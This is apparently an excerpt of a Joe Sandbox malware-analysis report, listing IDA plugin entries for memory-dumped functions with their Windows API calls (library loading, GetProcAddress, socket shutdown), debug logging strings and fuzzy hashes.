Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: AddressErrorLastProcfflushfwrite
String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
API String ID: 1224403792-3063791425
Opcode ID: 1562570c0f50b7283fd6ae6107e512a80eca33ed24826a6847df793e12344371
Instruction ID: 66616cf15bbc41dee708c95cccf99a80e46fcba3fd5960a5fc888fdd53dd7a69
Opcode Fuzzy Hash: 1562570c0f50b7283fd6ae6107e512a80eca33ed24826a6847df793e12344371
Instruction Fuzzy Hash: 19F0D1A0A0968741FB11AF46A9209BDE2217F58BE0F944033CD4C4BB95EEADE542C320

Function 00007FFE11BDBBE3 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FFE11BDBC03

Part of subcall function 00007FFE11BDC852: fwrite.MSVCRT ref: 00007FFE11BDC8FE
Part of subcall function 00007FFE11BDC852: fflush.MSVCRT ref: 00007FFE11BDC90A

GetLastError.KERNEL32 ref: 00007FFE11BDBC36

Strings

[D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p), xrefs: 00007FFE11BDBC23
module_get_proc, xrefs: 00007FFE11BDBC1C, 00007FFE11BDBC46
[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu), xrefs: 00007FFE11BDBC4D

Memory Dump Source

Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd

Similarity

API ID: AddressErrorLastProcfflushfwrite
String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
API String ID: 1224403792-3063791425
Opcode ID: fafc799aa92d9d60547a22b758ba0d3b5ae50fba84d732ef87da3ca2ea9f435e
Instruction ID: 9736af8a16d255916c9888b07bdaa1a99c2678058fa08f60c6b008cce06d6ac4
Opcode Fuzzy Hash: fafc799aa92d9d60547a22b758ba0d3b5ae50fba84d732ef87da3ca2ea9f435e
Instruction Fuzzy Hash: 71F0A290A0EF47D1FF264F07A901DF95659AF04BE8F4860B1CC4D077B4EE2CA5468300

Function 00007FFE1A4F3D33 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FFE1A4F3D53

Part of subcall function 00007FFE1A4F1352: fwrite.MSVCRT ref: 00007FFE1A4F13FE
Part of subcall function 00007FFE1A4F1352: fflush.MSVCRT ref: 00007FFE1A4F140A

GetLastError.KERNEL32 ref: 00007FFE1A4F3D86

Strings

module_get_proc, xrefs: 00007FFE1A4F3D6C, 00007FFE1A4F3D96
[D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p), xrefs: 00007FFE1A4F3D73
[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu), xrefs: 00007FFE1A4F3D9D

Memory Dump Source

Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true

Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd

Similarity

API ID: AddressErrorLastProcfflushfwrite
String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
API String ID: 1224403792-3063791425
Opcode ID: 0a66c11b569c4f10f79f34f7ec77922b59573ebafc7ce5539a2654754b0e73a4
Instruction ID: 5a64b5d3a574ca9ee0b893ef8469d5f5fbd3fc9bccb8113bb726729a61810223
Opcode Fuzzy Hash: 0a66c11b569c4f10f79f34f7ec77922b59573ebafc7ce5539a2654754b0e73a4
Instruction Fuzzy Hash: 70F086A0B0EA0392FA019B0BBA401FA12116F46FF5F0860F2CD1D0B7A6EE2CE5568300

Function 00007FFE126E50D3 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FFE126E50F3

Part of subcall function 00007FFE126E2072: fwrite.MSVCRT ref: 00007FFE126E211E
Part of subcall function 00007FFE126E2072: fflush.MSVCRT ref: 00007FFE126E212A

GetLastError.KERNEL32 ref: 00007FFE126E5126

Strings

module_get_proc, xrefs: 00007FFE126E510C, 00007FFE126E5136
[D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p), xrefs: 00007FFE126E5113
[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu), xrefs: 00007FFE126E513D

Memory Dump Source

Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true

Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd

Similarity

API ID: AddressErrorLastProcfflushfwrite
String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
API String ID: 1224403792-3063791425
Opcode ID: a7cfe317345e09ad6b23b45929449eeeeaa1a6b025e17c0387b62b8fd99eaad9
Instruction ID: 220296ad09da86f9471e418c0503f436c5b7691aa0591ac168f41d5faa43438a
Opcode Fuzzy Hash: a7cfe317345e09ad6b23b45929449eeeeaa1a6b025e17c0387b62b8fd99eaad9
Instruction Fuzzy Hash: 69F0A990A08A4782FF119B47BC102E912226F0ABE4F0840B1CC5D0B7F8FEACEA469304

Function 00007FFE1A5276B3 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FFE1A5276D3

Part of subcall function 00007FFE1A5277A2: fwrite.MSVCRT ref: 00007FFE1A52784E
Part of subcall function 00007FFE1A5277A2: fflush.MSVCRT ref: 00007FFE1A52785A

GetLastError.KERNEL32 ref: 00007FFE1A527706

Strings

module_get_proc, xrefs: 00007FFE1A5276EC, 00007FFE1A527716
[D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p), xrefs: 00007FFE1A5276F3
[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu), xrefs: 00007FFE1A52771D

Memory Dump Source

Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID: AddressErrorLastProcfflushfwrite
String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
API String ID: 1224403792-3063791425
Opcode ID: 67dab3cd625592a012ad7dec1e73096218c47b3540de6f7a9e44a37564ad1708
Instruction ID: 4dad5a03412f721e4f858f279c9f3531af5e1f22fe77dd990194b41f44699049
Opcode Fuzzy Hash: 67dab3cd625592a012ad7dec1e73096218c47b3540de6f7a9e44a37564ad1708
Instruction Fuzzy Hash: 8BF06D54F1DE4792FA52C797A8002B95252AF86FE4F1840F3DC4D4B7B4EF2CA5468300

Function 00007FFE115029B3 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FFE115029D3

Part of subcall function 00007FFE115040D2: fwrite.MSVCRT ref: 00007FFE1150417E
Part of subcall function 00007FFE115040D2: fflush.MSVCRT ref: 00007FFE1150418A

GetLastError.KERNEL32 ref: 00007FFE11502A06

Strings

module_get_proc, xrefs: 00007FFE115029EC, 00007FFE11502A16
[D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p), xrefs: 00007FFE115029F3
[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu), xrefs: 00007FFE11502A1D

Memory Dump Source

Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd

Similarity

API ID: AddressErrorLastProcfflushfwrite
String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
API String ID: 1224403792-3063791425
Opcode ID: dbcf099b603b3ec46b1e2511ebe9725b65a6cce9015f211c21d5d371d3fdd735
Instruction ID: 8750f9a37f951b53a572ba512bc41a614aa2f9de532ee360e1be003f71d89bc5
Opcode Fuzzy Hash: dbcf099b603b3ec46b1e2511ebe9725b65a6cce9015f211c21d5d371d3fdd735
Instruction Fuzzy Hash: 9AF0D195A0DE4381FF228B87A8001A9571A6F44BF4F5841B5DD0C0B7B4EF6CE5AA8300

Function 00007FFE11EC4D73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FFE11EC4D93

Part of subcall function 00007FFE11EC9DC2: fwrite.MSVCRT ref: 00007FFE11EC9E6E
Part of subcall function 00007FFE11EC9DC2: fflush.MSVCRT ref: 00007FFE11EC9E7A

GetLastError.KERNEL32 ref: 00007FFE11EC4DC6

Strings

module_get_proc, xrefs: 00007FFE11EC4DAC, 00007FFE11EC4DD6
[D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p), xrefs: 00007FFE11EC4DB3
[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu), xrefs: 00007FFE11EC4DDD

Memory Dump Source

Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: AddressErrorLastProcfflushfwrite
String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
API String ID: 1224403792-3063791425
Opcode ID: 0279ee0fba7c6e178516fd32448990f9dbb55b2387454419a162d72c715561de
Instruction ID: cd190a78cc78940587662a6f917e353ebeeae1a993397093ebc04b5e94364ed8
Opcode Fuzzy Hash: 0279ee0fba7c6e178516fd32448990f9dbb55b2387454419a162d72c715561de
Instruction Fuzzy Hash: 8BF08150A09E5352FF119BD7AD006A767696F04BE0F8855B1DD4D0B7B4EE2CE5468300

Function 00007FFE11BDBC64 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFE11BDBC72

Part of subcall function 00007FFE11BDC852: fwrite.MSVCRT ref: 00007FFE11BDC8FE
Part of subcall function 00007FFE11BDC852: fflush.MSVCRT ref: 00007FFE11BDC90A

GetLastError.KERNEL32 ref: 00007FFE11BDBC9E

Strings

[I] (%s) -> Done(name=%s,ret=0x%p), xrefs: 00007FFE11BDBC8D
module_load, xrefs: 00007FFE11BDBC86, 00007FFE11BDBCAA
[E] (%s) -> Failed(name=%s,gle=%lu), xrefs: 00007FFE11BDBCB1

Memory Dump Source

Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd

Similarity

API ID: ErrorLastLibraryLoadfflushfwrite
String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
API String ID: 4085810780-3386190286
Opcode ID: 697fd883e4c98c3a111c703db0c1e2690921e3af5536f40dc2a3e64cf62ec6d9
Instruction ID: efa32403028c216aec5d6d44be9682250260daf832706317d7bfb7d0dc211119
Opcode Fuzzy Hash: 697fd883e4c98c3a111c703db0c1e2690921e3af5536f40dc2a3e64cf62ec6d9
Instruction Fuzzy Hash: D4F09A60E0EE47D0EF36AF1BA840CF41648AF05BB9B4835B0C80C06B70EE2CA9858310

Function 00007FFE1A4F3DB4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFE1A4F3DC2

Part of subcall function 00007FFE1A4F1352: fwrite.MSVCRT ref: 00007FFE1A4F13FE
Part of subcall function 00007FFE1A4F1352: fflush.MSVCRT ref: 00007FFE1A4F140A

GetLastError.KERNEL32 ref: 00007FFE1A4F3DEE

Strings

[I] (%s) -> Done(name=%s,ret=0x%p), xrefs: 00007FFE1A4F3DDD
[E] (%s) -> Failed(name=%s,gle=%lu), xrefs: 00007FFE1A4F3E01
module_load, xrefs: 00007FFE1A4F3DD6, 00007FFE1A4F3DFA

Memory Dump Source

Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true

Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd

Similarity

API ID: ErrorLastLibraryLoadfflushfwrite
String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
API String ID: 4085810780-3386190286
Opcode ID: e9b2e49849ddc16e52caa7a8cac415f1aaf56702dfb014bfad4af1c08c753447
Instruction ID: 59ced872b02093e216a16845ae1313a555e3d886d93d79f2f5d44c98a5e955b6
Opcode Fuzzy Hash: e9b2e49849ddc16e52caa7a8cac415f1aaf56702dfb014bfad4af1c08c753447
Instruction Fuzzy Hash: 9DF01260B0EE0791FA55A76BB9804F91A506F06FB1B8824F2CD0D16776EE2CB596C300

Function 00007FFE126E5154 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFE126E5162

Part of subcall function 00007FFE126E2072: fwrite.MSVCRT ref: 00007FFE126E211E
Part of subcall function 00007FFE126E2072: fflush.MSVCRT ref: 00007FFE126E212A

GetLastError.KERNEL32 ref: 00007FFE126E518E

Strings

[E] (%s) -> Failed(name=%s,gle=%lu), xrefs: 00007FFE126E51A1
[I] (%s) -> Done(name=%s,ret=0x%p), xrefs: 00007FFE126E517D
module_load, xrefs: 00007FFE126E5176, 00007FFE126E519A

Memory Dump Source

Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true

Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd

Similarity

API ID: ErrorLastLibraryLoadfflushfwrite
String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
API String ID: 4085810780-3386190286
Opcode ID: eddca9e64613da5a5af11230b1fdb9adc60d80f962126bf1a1c4b22804975db0
Instruction ID: 05ad158a2bd5068a9552b9763586b46325432025cdaeff441433275ddb472241
Opcode Fuzzy Hash: eddca9e64613da5a5af11230b1fdb9adc60d80f962126bf1a1c4b22804975db0
Instruction Fuzzy Hash: 28F03A11A09E4B94EF11EB5BBC604F012615F1ABE0B4801F1C80C167F5FD9CA9868304

Function 00007FFE1A527734 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFE1A527742

Part of subcall function 00007FFE1A5277A2: fwrite.MSVCRT ref: 00007FFE1A52784E
Part of subcall function 00007FFE1A5277A2: fflush.MSVCRT ref: 00007FFE1A52785A

GetLastError.KERNEL32 ref: 00007FFE1A52776E

Strings

[I] (%s) -> Done(name=%s,ret=0x%p), xrefs: 00007FFE1A52775D
[E] (%s) -> Failed(name=%s,gle=%lu), xrefs: 00007FFE1A527781
module_load, xrefs: 00007FFE1A527756, 00007FFE1A52777A

Memory Dump Source

Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID: ErrorLastLibraryLoadfflushfwrite
String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
API String ID: 4085810780-3386190286
Opcode ID: 7b7284ad99e7ff1f44cb58d40aaf81ba3cdcdc8e088978f854639b2754e328da
Instruction ID: 04307e47ece7f18266d73c83e0af70cdb0e2f0b2e86ec7501bcd478610e01e1b
Opcode Fuzzy Hash: 7b7284ad99e7ff1f44cb58d40aaf81ba3cdcdc8e088978f854639b2754e328da
Instruction Fuzzy Hash: 71F09A91F0EE0786FA01D79BA8008B012106F97FB4F1805F3C80E06374FE1CA5418300

Function 00007FFE1A521462 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28networkCOMMON

Download Yara Rule

APIs

shutdown.WS2_32 ref: 00007FFE1A521470
WSAGetLastError.WS2_32 ref: 00007FFE1A521499

Part of subcall function 00007FFE1A5277A2: fwrite.MSVCRT ref: 00007FFE1A52784E
Part of subcall function 00007FFE1A5277A2: fflush.MSVCRT ref: 00007FFE1A52785A

Strings

sock_shutdown, xrefs: 00007FFE1A52147E, 00007FFE1A5214B0
[D] (%s) -> Done(sock=0x%llx), xrefs: 00007FFE1A521485
[E] (%s) -> shutdown failed(sock=0x%llx,chan=%d,WSAgle=%d), xrefs: 00007FFE1A5214B7

Memory Dump Source

Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID: ErrorLastfflushfwriteshutdown
String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> shutdown failed(sock=0x%llx,chan=%d,WSAgle=%d)$sock_shutdown
API String ID: 2143829457-932964775
Opcode ID: 1db78aa528ddbe588164316255f4897511fba48a89597079c99fa159a0828559
Instruction ID: 01cd1b070d49ffc361cf489628fd61229a82288fc770fc9128f20f39db4858f7
Opcode Fuzzy Hash: 1db78aa528ddbe588164316255f4897511fba48a89597079c99fa159a0828559
Instruction Fuzzy Hash: D8F0B465F4CD03D1E6105757E8400BA27216FA3F71F5445F3D90D521B1EE2CA5468340

Function 00007FFE11502A34 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFE11502A42

Part of subcall function 00007FFE115040D2: fwrite.MSVCRT ref: 00007FFE1150417E
Part of subcall function 00007FFE115040D2: fflush.MSVCRT ref: 00007FFE1150418A

GetLastError.KERNEL32 ref: 00007FFE11502A6E

Strings

[E] (%s) -> Failed(name=%s,gle=%lu), xrefs: 00007FFE11502A81
module_load, xrefs: 00007FFE11502A56, 00007FFE11502A7A
[I] (%s) -> Done(name=%s,ret=0x%p), xrefs: 00007FFE11502A5D

Memory Dump Source

Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLastLibraryLoadfflushfwrite
String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
API String ID: 4085810780-3386190286
Opcode ID: 36203e6f37c63859e8e4abccedc21d8fb4a9e1d8d10a0d2725006cb0010dba7c
Instruction ID: da476732b79ead9cf9574ddfb59001c5617359c0bb52621884a3d249138cefa6
Opcode Fuzzy Hash: 36203e6f37c63859e8e4abccedc21d8fb4a9e1d8d10a0d2725006cb0010dba7c
Instruction Fuzzy Hash: FAF0E215E0EE4785FF629797A8004B82B096F04BF0F4851F5CD0C6BB70EE9CA9858301

Function 00007FFE11EC4DF4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFE11EC4E02

Part of subcall function 00007FFE11EC9DC2: fwrite.MSVCRT ref: 00007FFE11EC9E6E
Part of subcall function 00007FFE11EC9DC2: fflush.MSVCRT ref: 00007FFE11EC9E7A

GetLastError.KERNEL32 ref: 00007FFE11EC4E2E

Strings

[E] (%s) -> Failed(name=%s,gle=%lu), xrefs: 00007FFE11EC4E41
[I] (%s) -> Done(name=%s,ret=0x%p), xrefs: 00007FFE11EC4E1D
module_load, xrefs: 00007FFE11EC4E16, 00007FFE11EC4E3A

Memory Dump Source

Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: ErrorLastLibraryLoadfflushfwrite
String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
